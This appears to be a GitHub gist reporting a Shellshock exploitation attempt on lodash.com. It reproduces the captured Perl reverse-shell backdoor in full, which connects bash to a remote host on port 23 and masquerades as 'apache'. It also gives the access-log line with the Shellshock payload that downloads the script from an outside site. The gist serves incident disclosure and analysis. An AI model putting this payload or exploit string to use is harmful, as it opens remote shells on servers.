Skip to content

Instantly share code, notes, and snippets.

@mathiasbynens mathiasbynens/README.md
Last active Aug 29, 2015

Embed
What would you like to do?

Someone tried to exploit the Shellshock vulnerability in Bash on lodash.com, likely as part of a mass-exploit attempt.

In this case, the exploit attempted to download a modified version of @schierlm’s pseudo-terminal Perl script that would connect to 72.167.37.182 on port 23. The download URL contains the targeted host name (?h=lodash.com) which gives the attacker an indication of which hosts might have the /tmp/a.pl backdoor in place.

#!/usr/bin/perl -w
use IO::Socket;
use Fcntl;
# IOCTLs
$TIOCGPTN = -2147199952;
$TIOCSPTLCK = 1074025521;
$EAGAIN=11;
print "pmsh.pl v0.1 (c) 2006 Michael Schierl <schierlm-public AT gmx DOT de>\n";
$HOST="72.167.37.182";
$PORT="23";
$0="apache";
print "Connecting to $HOST:$PORT... ";
$sock = new IO::Socket::INET (
PeerAddr => $HOST,
PeerPort => $PORT,
Proto => 'tcp',
Blocking => 0,
) or die $!;
print "ok\nAllocatig pseudo terminal... ";
## ptsname
sysopen (PTMX, '/dev/ptmx', O_RDWR|O_NONBLOCK) or die $!;
$tmp='';
ioctl (PTMX, $TIOCGPTN, $tmp) or die $!;
$pts = unpack('i', $tmp);
print "/dev/pts/$pts\nInitializing pseudo terminal... ";
## grantpt not needed on devpts
## unlockpt
$unlock=pack('i', 0);
ioctl(PTMX, $TIOCSPTLCK, $unlock) or die $!;
## prepare daemonizing
chdir '/' or die $!;
open STDIN, '/dev/null' or die $!;
umask 0;
print "ok\nForking shell thread...";
defined($pid = fork) or die $!;
exit if $pid;
defined($pid = fork) or die $!;
if (!$pid) {
exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or
exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts") or
die $!;
exit;
}
print "ok\nHave fun!\n";
open STDOUT, '>>/dev/null' or die $!;
open STDERR, '>>/dev/null' or die $!;
$pp = PTMX;
$rin=$win=$ein='';
vec($rin,fileno($pp),1) =1;
vec($rin,fileno($sock),1) = 1;
select $sock;
$|=1;
select PTMX;
$|=1;
select STDOUT;
$|=1;
$finished=0;
sub forwarddata {
my ($from,$to) = @_;
while(1) {
$rv = sysread($from, $buff, 1024);
last if (!defined($rv) && $! == $EAGAIN);
defined($rv) or die $!;
if ($rv == 0) { $finished = 1; last;}
while(length $buff > 0) {
$rv = syswrite($to, $buff, length $buff);
if (!defined($rv) && $! == $EAGAIN) {
## try again
next;
}
defined($rv) or die $!;
last if ($rv == length $buff);
substr($buff,0,$rv) = '';
}
}
}
while(! $finished) {
$nfound = select($rout=$rin, $wout=$win, $eout=$ein, undef);
die $! if ($nfound == -1);
forwarddata($pp,$sock);
last if $finished;
forwarddata($sock,$pp);
last if $finished;
}
close PTMX;
close $sock;
$wout=$eout.$wout.$rout;
109.95.210.196 - - [26/Sep/2014:06:36:30 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=lodash.com -O /tmp/a.pl\""
@schierlm

This comment has been minimized.

Copy link

schierlm commented Sep 26, 2014

Wow, people are using old scripts of mine and are even too lazy to remove the copyright notice :)

Nowadays, in most cases you can use script /dev/null instead to allocate you a pseudo terminal. But I wouldn't use it in intiial exploitation (only where I have permission of course, I don't access random hosts on the 'net) anyway - just give me a "raw shell", I can later upgrade it if needed :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.